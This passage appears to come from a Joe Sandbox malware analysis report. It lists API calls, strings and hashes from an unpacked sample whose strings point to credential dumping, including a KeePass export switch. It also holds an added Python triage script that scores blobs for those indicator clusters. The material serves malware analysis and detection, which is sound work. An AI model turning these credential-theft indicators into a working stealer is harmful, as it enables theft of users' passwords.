                                                                                                              • Opcode Fuzzy Hash: ed70c74fadb10ab7d72ef9915f44c0908033a9cd6b37cdcdb0b46a34d9d8d060
                                                                                                              • Instruction Fuzzy Hash: A401843328931228FA2538663D07F834F48CB52BBBF32405BF800D81C6FE8C4565605E
                                                                                                              APIs
                                                                                                                • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                                                                                                • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                                                                                                • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                                                              • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 004138ED
                                                                                                              • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004138FE
                                                                                                              • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExW), ref: 0041390F
                                                                                                              • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00413920
                                                                                                              • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 00413931
                                                                                                              • FreeLibrary.KERNEL32(00000000), ref: 00413951
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: AddressProc$Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
                                                                                                              • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                                                                              • API String ID: 2012295524-70141382
                                                                                                              • Opcode ID: de34bece31b7142a998ab6ccb1b4abbedb6e98f3c738f5240e3b00242a7e4309
                                                                                                              • Instruction ID: 1ed0e205fb1d3ca6b4a3c81c58fecbd4dea9624ac3f9f6029147382c5f000437
                                                                                                              • Opcode Fuzzy Hash: de34bece31b7142a998ab6ccb1b4abbedb6e98f3c738f5240e3b00242a7e4309
                                                                                                              • Instruction Fuzzy Hash: 7301B5B1905312DAD7705F31AE40B6B2FA45B81FA7B10003BEA00D1286DBFCC8C5DA6E
                                                                                                              APIs
                                                                                                              • GetModuleHandleW.KERNEL32(kernel32.dll,?,0041339D), ref: 0041384C
                                                                                                              • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 00413865
                                                                                                              • GetProcAddress.KERNEL32(00000000,Module32First), ref: 00413876
                                                                                                              • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 00413887
                                                                                                              • GetProcAddress.KERNEL32(00000000,Process32First), ref: 00413898
                                                                                                              • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 004138A9
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: AddressProc$HandleModule
                                                                                                              • String ID: CreateToolhelp32Snapshot$Module32First$Module32Next$Process32First$Process32Next$kernel32.dll
                                                                                                              • API String ID: 667068680-3953557276
                                                                                                              • Opcode ID: 31f1d1be7c9a4426e09052d790ecb19dd0b8106983b19d46a1984a4086cae070
                                                                                                              • Instruction ID: ced2a49a11d8a5ad7e856d80fa96ce31c371be68fc2c17877008b9264e9f9212
                                                                                                              • Opcode Fuzzy Hash: 31f1d1be7c9a4426e09052d790ecb19dd0b8106983b19d46a1984a4086cae070
                                                                                                              • Instruction Fuzzy Hash: 58F08631900317A9E7206F357D41B672AE45B86F83714017BFC04D12D9DB7CE98A9B6D
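
The two resolver functions above (psapi.dll exports fetched with LoadLibraryW from the system directory followed by GetProcAddress, and the Toolhelp32 family fetched from the already-loaded kernel32.dll), together with the UTF-16 switch table /scomma, /shtml, /skeepass, /stab, /stabular, /sverhtml, /sxml listed earlier, survive as plaintext literals in the unpacked 00400000 image. The Python triage helper below is an added example written for this page; it is not code from Joe Sandbox, from the sample, or from NirSoft. It scans a byte blob for those three string clusters and scores them. The thresholds, the labels and the requirement that GetProcAddress be imported alongside a cluster are the example's own assumptions, and the blobs it scans are constructed inline rather than taken from the dump.

```python
"""Triage heuristic for the indicator strings listed in this report.

Added example for this page; it is not code from Joe Sandbox, from Remcos or
from NirSoft.  It scans a raw byte blob (a PE file, or an unpacked image such as
the 00400000 memory dump above) for the two run-time API-resolution name
clusters and the UTF-16 export-switch table shown in the function listings,
and returns a scored verdict.  Thresholds and labels are the example's own
assumptions, not anything the sandbox report defines.
"""
from __future__ import annotations

from dataclasses import dataclass, field

# Names passed to GetProcAddress by the psapi.dll resolver (refs 004138ED..00413931).
PSAPI_NAMES = (
    "EnumProcesses", "EnumProcessModules", "GetModuleBaseNameW",
    "GetModuleFileNameExW", "GetModuleInformation",
)
# Names passed to GetProcAddress by the kernel32.dll resolver (refs 00413865..004138A9).
TOOLHELP_NAMES = (
    "CreateToolhelp32Snapshot", "Process32First", "Process32Next",
    "Module32First", "Module32Next",
)
# Switch table compared with _wcsicmp in the report, hence searched as UTF-16LE.
EXPORT_SWITCHES = (
    "/scomma", "/shtml", "/skeepass", "/stab", "/stabular", "/sverhtml", "/sxml",
)


@dataclass
class Verdict:
    psapi: list[str] = field(default_factory=list)
    toolhelp: list[str] = field(default_factory=list)
    switches: list[str] = field(default_factory=list)
    resolver: bool = False  # GetProcAddress imported alongside a name cluster

    @property
    def score(self) -> int:
        """0..4: one point per (nearly) complete cluster, one for the resolver."""
        return (int(len(self.psapi) >= 4)
                + int(len(self.toolhelp) >= 4)
                + int(len(self.switches) >= 5)
                + int(self.resolver))

    @property
    def label(self) -> str:
        if self.score >= 3:
            return "likely-credential-dumper"
        if self.score >= 1:
            return "suspicious"
        return "clean"


def _find_c_strings(blob: bytes, names: tuple[str, ...], encoding: str) -> list[str]:
    """Names present as NUL-terminated literals in the given encoding.

    Requiring the terminator means 'Process32First' does not match merely because
    'Process32FirstW' is present; the exact literal the resolver uses must exist."""
    nul = "\x00".encode(encoding)
    return [n for n in names if n.encode(encoding) + nul in blob]


def triage(blob: bytes) -> Verdict:
    v = Verdict()
    v.psapi = _find_c_strings(blob, PSAPI_NAMES, "ascii")
    v.toolhelp = _find_c_strings(blob, TOOLHELP_NAMES, "ascii")
    v.switches = _find_c_strings(blob, EXPORT_SWITCHES, "utf-16-le")
    # A statically linked process monitor carries the same names but no
    # GetProcAddress-driven lookup, so the resolver point needs both.
    v.resolver = b"GetProcAddress\x00" in blob and bool(v.psapi or v.toolhelp)
    return v


def _constructed_rdata(ascii_names: tuple[str, ...], switches: tuple[str, ...]) -> bytes:
    """Fake read-only data section (constructed test input, not bytes from the sample)."""
    out = b"".join(n.encode("ascii") + b"\x00" for n in ascii_names)
    out += b"".join(s.encode("utf-16-le") + b"\x00\x00" for s in switches)
    return out


# Mimics the unpacked payload: import name for GetProcAddress, both resolver
# name clusters, and the full switch table.
SUSPICIOUS_BLOB = _constructed_rdata(
    ("GetProcAddress", "psapi.dll", "kernel32.dll") + PSAPI_NAMES + TOOLHELP_NAMES,
    EXPORT_SWITCHES,
)
# Mimics a benign task-manager-style tool: Toolhelp names present, nothing else.
TOOLHELP_ONLY_BLOB = _constructed_rdata(TOOLHELP_NAMES, ())


if __name__ == "__main__":
    for name, blob in (("payload-like", SUSPICIOUS_BLOB), ("toolhelp-only", TOOLHELP_ONLY_BLOB)):
        v = triage(blob)
        print(f"{name}: score={v.score} label={v.label} "
              f"psapi={len(v.psapi)} toolhelp={len(v.toolhelp)} switches={len(v.switches)}")
```

Against a real artifact, pass the bytes of the unpacked dump or the PE file to `triage()`; the constructed blobs only show the two ends of the scale. A Toolhelp cluster on its own scores one point and is labelled suspicious rather than malicious, because ordinary process-listing tools carry the same five names; the score climbs only when the psapi cluster, the switch table and a GetProcAddress import appear together, which is the combination this report shows.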
                                                                                                              APIs
                                                                                                              • GetDC.USER32(00000000), ref: 004121FF
                                                                                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0041220A
                                                                                                              • ReleaseDC.USER32(00000000,00000000), ref: 0041221F
                                                                                                              • SetBkMode.GDI32(?,00000001), ref: 00412232
                                                                                                              • SetTextColor.GDI32(?,00FF0000), ref: 00412240
                                                                                                              • SelectObject.GDI32(?,?), ref: 00412251
                                                                                                              • DrawTextExW.USER32(?,?,000000FF,?,00000024,?), ref: 00412285
                                                                                                              • SelectObject.GDI32(00000014,00000005), ref: 00412291
                                                                                                                • Part of subcall function 00411FC6: GetCursorPos.USER32(?), ref: 00411FD0
                                                                                                                • Part of subcall function 00411FC6: GetSubMenu.USER32(?,00000000), ref: 00411FDE
                                                                                                                • Part of subcall function 00411FC6: TrackPopupMenu.USER32(00000000,00000002,?,?,00000000,?,00000000), ref: 0041200F
                                                                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 004122AC
                                                                                                              • LoadCursorW.USER32(00000000,00000067), ref: 004122B5
                                                                                                              • SetCursor.USER32(00000000), ref: 004122BC
                                                                                                              • PostMessageW.USER32(?,00000428,00000000,00000000), ref: 00412304
                                                                                                              • memcpy.MSVCRT(?,?,00002008), ref: 0041234D
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
Similarity
• API ID: Cursor$MenuObjectSelectText$CapsColorDeviceDrawHandleLoadMessageModeModulePopupPostReleaseTrackmemcpy
• String ID:
• API String ID: 1700100422-0
APIs
• GetClientRect.USER32(?,?), ref: 004111E0
• GetWindowRect.USER32(?,?), ref: 004111F6
• GetWindowRect.USER32(?,?), ref: 0041120C
• GetDlgItem.USER32(00000000,0000040D), ref: 00411246
• GetWindowRect.USER32(00000000), ref: 0041124D
• MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0041125D
• BeginDeferWindowPos.USER32(00000004), ref: 00411281
• DeferWindowPos.USER32(?,?,00000000,00000000,00000000,?,?,00000004), ref: 004112A4
• DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000006), ref: 004112C3
• DeferWindowPos.USER32(?,?,00000000,00000000,000000DC,?,?,00000004), ref: 004112EE
• DeferWindowPos.USER32(?,00000000,00000000,00000000,?,?,000000DC,00000004), ref: 00411306
• EndDeferWindowPos.USER32(?), ref: 0041130B
Similarity
• API ID: Window$Defer$Rect$BeginClientItemPoints
• String ID:
• API String ID: 552707033-0
APIs
• CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000,?,?,?,0040C255,?,?,*.*,0040C2BF,00000000), ref: 0040C0A4
  • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
• GetFileSize.KERNEL32(00000000,00000000), ref: 0040C0D4
  • Part of subcall function 0040BFF3: _memicmp.MSVCRT ref: 0040C00D
  • Part of subcall function 0040BFF3: memcpy.MSVCRT(?,?,00000004,00000000,?,?,?,?,?,?,?,?,*.*,0040C2BF,00000000), ref: 0040C024
• memcpy.MSVCRT(00000000,?,00000004,00000000,?,?,?,?), ref: 0040C11B
• strchr.MSVCRT ref: 0040C140
• strchr.MSVCRT ref: 0040C151
• _strlwr.MSVCRT ref: 0040C15F
• memset.MSVCRT ref: 0040C17A
• CloseHandle.KERNEL32(00000000), ref: 0040C1C7
Strings
Similarity
• API ID: File$memcpystrchr$CloseCreateHandlePointerSize_memicmp_strlwrmemset
• String ID: 4$h
• API String ID: 4066021378-1856150674
APIs
Strings
Similarity
• API ID: memset$_snwprintf
• String ID: %%0.%df
• API String ID: 3473751417-763548558
APIs
• SetTimer.USER32(?,00000041,00000064,00000000), ref: 004060C7
• KillTimer.USER32(?,00000041), ref: 004060D7
• KillTimer.USER32(?,00000041), ref: 004060E8
• GetTickCount.KERNEL32 ref: 0040610B
• GetParent.USER32(?), ref: 00406136
• SendMessageW.USER32(00000000), ref: 0040613D
• BeginDeferWindowPos.USER32(00000004), ref: 0040614B
• EndDeferWindowPos.USER32(00000000), ref: 0040619B
• InvalidateRect.USER32(?,?,00000001), ref: 004061A7
Strings
Similarity
• API ID: Timer$DeferKillWindow$BeginCountInvalidateMessageParentRectSendTick
• String ID: A
• API String ID: 2892645895-3554254475
APIs
• LoadMenuW.USER32(?,?), ref: 0040D97F
  • Part of subcall function 0040D7A7: GetMenuItemCount.USER32(?), ref: 0040D7BD
  • Part of subcall function 0040D7A7: memset.MSVCRT ref: 0040D7DC
  • Part of subcall function 0040D7A7: GetMenuItemInfoW.USER32 ref: 0040D818
  • Part of subcall function 0040D7A7: wcschr.MSVCRT ref: 0040D830
• DestroyMenu.USER32(00000000), ref: 0040D99D
• CreateDialogParamW.USER32(?,?,00000000,0040D952,00000000), ref: 0040D9F2
• GetDesktopWindow.USER32 ref: 0040D9FD
• CreateDialogParamW.USER32(?,?,00000000), ref: 0040DA0A
• memset.MSVCRT ref: 0040DA23
• GetWindowTextW.USER32(00000005,?,00001000), ref: 0040DA3A
• EnumChildWindows.USER32(00000005,Function_0000D898,00000000), ref: 0040DA67
• DestroyWindow.USER32(00000005), ref: 0040DA70
  • Part of subcall function 0040D5D6: _snwprintf.MSVCRT ref: 0040D5FB
Strings
Similarity
• API ID: Menu$Window$CreateDestroyDialogItemParammemset$ChildCountDesktopEnumInfoLoadTextWindows_snwprintfwcschr
• String ID: caption
• API String ID: 973020956-4135340389
APIs
Strings
• <meta http-equiv='content-type' content='text/html;charset=%s'>, xrefs: 00410ADD
• <table dir="rtl"><tr><td>, xrefs: 00410B00
• <br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>, xrefs: 00410B3C
• <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">, xrefs: 00410A70
Similarity
• API ID: memset$_snwprintf$wcscpy
• String ID: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">$<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>$<meta http-equiv='content-type' content='text/html;charset=%s'>$<table dir="rtl"><tr><td>
• API String ID: 1283228442-2366825230
APIs
• wcschr.MSVCRT ref: 00413972
• wcscpy.MSVCRT ref: 00413982
  • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409806
  • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409810
  • Part of subcall function 004097F7: _memicmp.MSVCRT ref: 0040982B
• wcscpy.MSVCRT ref: 004139D1
• wcscat.MSVCRT ref: 004139DC
• memset.MSVCRT ref: 004139B8
  • Part of subcall function 00409DD5: GetWindowsDirectoryW.KERNEL32(0045DC58,00000104,?,00413A11,?,?,00000000,00000208,?), ref: 00409DEB
  • Part of subcall function 00409DD5: wcscpy.MSVCRT ref: 00409DFB
• memset.MSVCRT ref: 00413A00
• memcpy.MSVCRT(?,?,00000004,?,?,00000000,00000208,?), ref: 00413A1B
• wcscat.MSVCRT ref: 00413A27
Strings
Similarity
• API ID: wcscpy$memsetwcscatwcslen$DirectoryWindows_memicmpmemcpywcschr
• String ID: \systemroot
• API String ID: 4173585201-1821301763
                                                                                                              • Opcode ID: 98bce9d9e9325d6f39714f6b424e1477d6b518cde7e6df5d8c0f4db39efede23
                                                                                                              • Instruction ID: a9582ad2fab6187976d7b5f1d827ce349b207672d34ede1993470c6c3fb504e1
                                                                                                              • Opcode Fuzzy Hash: 98bce9d9e9325d6f39714f6b424e1477d6b518cde7e6df5d8c0f4db39efede23
                                                                                                              • Instruction Fuzzy Hash: 7D21F6F68053146AE720FB619C86EEF73EC9F06719F20415FF115A20C6EA7C9A844B5E
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: wcscpy
                                                                                                              • String ID: AppData$Common Desktop$Common Programs$Common Start Menu$Common Startup$Desktop$Favorites$Programs$Start Menu$Startup
                                                                                                              • API String ID: 1284135714-318151290
                                                                                                              • Opcode ID: 0a607774d7c303284e27c7b04db276e27a23f0d6d0cd9d042bad1c6033713506
                                                                                                              • Instruction ID: e2253d4fd864bfabc2f945990654e2d0feb0e3e4f5de9ed447e77a37a808a444
                                                                                                              • Opcode Fuzzy Hash: 0a607774d7c303284e27c7b04db276e27a23f0d6d0cd9d042bad1c6033713506
                                                                                                              • Instruction Fuzzy Hash: 04F0127526EA4161142406240E0DEF75509D0D575F3F74A537A02E89D6FCCDDEC6609F
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Menu$Itemmemset$CountInfoModifywcscatwcschr
                                                                                                              • String ID: 0$6
                                                                                                              • API String ID: 4066108131-3849865405
                                                                                                              • Opcode ID: fc96a420e8f8bdf87928e34e657a0b6c1b8723afb93dcca2deed5b8d5a3436dd
                                                                                                              • Instruction ID: 23fd2219eb4cf2a86962fa47610fb6a66e7712bfbd77636794901fa2ff6d3352
                                                                                                              • Opcode Fuzzy Hash: fc96a420e8f8bdf87928e34e657a0b6c1b8723afb93dcca2deed5b8d5a3436dd
                                                                                                              • Instruction Fuzzy Hash: 1C317C72808344AFDB209F95D84499FB7E8FF84314F00493EFA48A2291D775D949CB5B
                                                                                                              APIs
                                                                                                              • memset.MSVCRT ref: 004082EF
                                                                                                                • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                                                              • memset.MSVCRT ref: 00408362
                                                                                                              • memset.MSVCRT ref: 00408377
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: memset$ByteCharMultiWide
                                                                                                              • String ID:
                                                                                                              • API String ID: 290601579-0
                                                                                                              • Opcode ID: aa14e1b9e389497361ed401ed70ebc10d5f62d7ff5e107018b9223dc9ab6e0fb
                                                                                                              • Instruction ID: eff1c4cb9ad8ed09cf65616da307521f953f8cb6273bc8e87bbfe44e88666a06
                                                                                                              • Opcode Fuzzy Hash: aa14e1b9e389497361ed401ed70ebc10d5f62d7ff5e107018b9223dc9ab6e0fb
                                                                                                              • Instruction Fuzzy Hash: E1716C72E0421DAFEF10EFA1EC82AEDB7B9EF04314F14406FE104B6191EB795A458B59
                                                                                                              APIs
                                                                                                              • memchr.MSVCRT ref: 00444EBF
                                                                                                              • memcpy.MSVCRT(?,0044EB0C,0000000B,?,?,?,00000000,00000000,00000000), ref: 00444F63
                                                                                                              • memcpy.MSVCRT(?,00000001,00000008,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00444F75
                                                                                                              • memcpy.MSVCRT(?,?,00000010,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00444F9D
                                                                                                              • memcpy.MSVCRT(?,0044EB0C,0000000B), ref: 00444FAF
                                                                                                              • memcpy.MSVCRT(?,00000001,00000008), ref: 00444FC1
                                                                                                              • memcpy.MSVCRT(PD,?,00000008,?,?), ref: 00445010
                                                                                                              • memset.MSVCRT ref: 0044505E
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: memcpy$memchrmemset
                                                                                                              • String ID: PD$PD
                                                                                                              • API String ID: 1581201632-2312785699
                                                                                                              • Opcode ID: 0e910d3a8e1f8c818d40de505798e2cb595e2298e7188f8e397b04e98a163445
                                                                                                              • Instruction ID: 10fb1f61a141a907ee6ef334180a592a84e160db04a0c58349e49e3250f7ff3f
                                                                                                              • Opcode Fuzzy Hash: 0e910d3a8e1f8c818d40de505798e2cb595e2298e7188f8e397b04e98a163445
                                                                                                              • Instruction Fuzzy Hash: 8D5192719002196BDF10EF69CC85EEEBBBCAF45304F0444ABE555E7246E738E648CBA4
                                                                                                              APIs
                                                                                                              • GetSystemMetrics.USER32(00000011), ref: 00409F5B
                                                                                                              • GetSystemMetrics.USER32(00000010), ref: 00409F61
                                                                                                              • GetDC.USER32(00000000), ref: 00409F6E
                                                                                                              • GetDeviceCaps.GDI32(00000000,00000008), ref: 00409F7F
                                                                                                              • GetDeviceCaps.GDI32(00000000,0000000A), ref: 00409F86
                                                                                                              • ReleaseDC.USER32(00000000,00000000), ref: 00409F8D
                                                                                                              • GetWindowRect.USER32(?,?), ref: 00409FA0
                                                                                                              • GetParent.USER32(?), ref: 00409FA5
                                                                                                              • GetWindowRect.USER32(00000000,00000000), ref: 00409FC2
                                                                                                              • MoveWindow.USER32(?,?,?,?,?,00000001), ref: 0040A021
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Window$CapsDeviceMetricsRectSystem$MoveParentRelease
                                                                                                              • String ID:
                                                                                                              • API String ID: 2163313125-0
                                                                                                              • Opcode ID: d78dd9667733c118ca5f823c40f75fbf68f042a28012a42387a4e68ecbaebf7d
                                                                                                              • Instruction ID: e27d49e141fc924f5dc8bb17b5c2b7dfe0ac862298cc10f95babd1b5c1aaa95e
                                                                                                              • Opcode Fuzzy Hash: d78dd9667733c118ca5f823c40f75fbf68f042a28012a42387a4e68ecbaebf7d
                                                                                                              • Instruction Fuzzy Hash: 66318475A00209AFDF14CFB9CD85AEEBBB9FB48354F050579E901F3290DA70ED458A50
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: free$wcslen
                                                                                                              • String ID:
                                                                                                              • API String ID: 3592753638-3916222277
                                                                                                              • Opcode ID: ee4a635328ec67d54f876bdb2dea934223b4b651374da98f2fba9a82a9ef0b7d
                                                                                                              • Instruction ID: 6c84a66137f0c35b9d0eb965e4703c645d554f15bb1c6f80accdbf0b715e4580
                                                                                                              • Opcode Fuzzy Hash: ee4a635328ec67d54f876bdb2dea934223b4b651374da98f2fba9a82a9ef0b7d
                                                                                                              • Instruction Fuzzy Hash: 78614A70E0421ADADF28AF95E6485EEB771FF04315F60807BE411B62D1EBB84981CB5D
                                                                                                              APIs
                                                                                                              • memset.MSVCRT ref: 0040A47B
                                                                                                              • _snwprintf.MSVCRT ref: 0040A4AE
                                                                                                              • wcslen.MSVCRT ref: 0040A4BA
                                                                                                              • memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
                                                                                                              • wcslen.MSVCRT ref: 0040A4E0
                                                                                                              • memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: memcpywcslen$_snwprintfmemset
                                                                                                              • String ID: %s (%s)$YV@
                                                                                                              • API String ID: 3979103747-598926743
                                                                                                              • Opcode ID: 1cd29c0c96bb3ddeb02ffde04bffb630c2350d0f86c95190f97a15d0a128dfe3
                                                                                                              • Instruction ID: 06bfc13611ed198a4270a5cd43788582667178ba612a9453d6f3368808cd6753
                                                                                                              • Opcode Fuzzy Hash: 1cd29c0c96bb3ddeb02ffde04bffb630c2350d0f86c95190f97a15d0a128dfe3
                                                                                                              • Instruction Fuzzy Hash: 31216F72900219BBDF21DF55CC45D8BB7B8BF04318F018466E948AB106DB74EA188BD9
                                                                                                              APIs
                                                                                                              • LoadLibraryW.KERNEL32(comctl32.dll,00000000,?,00000002,?,?,?,00412785,00000000,?,00000002,?,0044688C,00000000,?,0000000A), ref: 004044C3
                                                                                                              • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
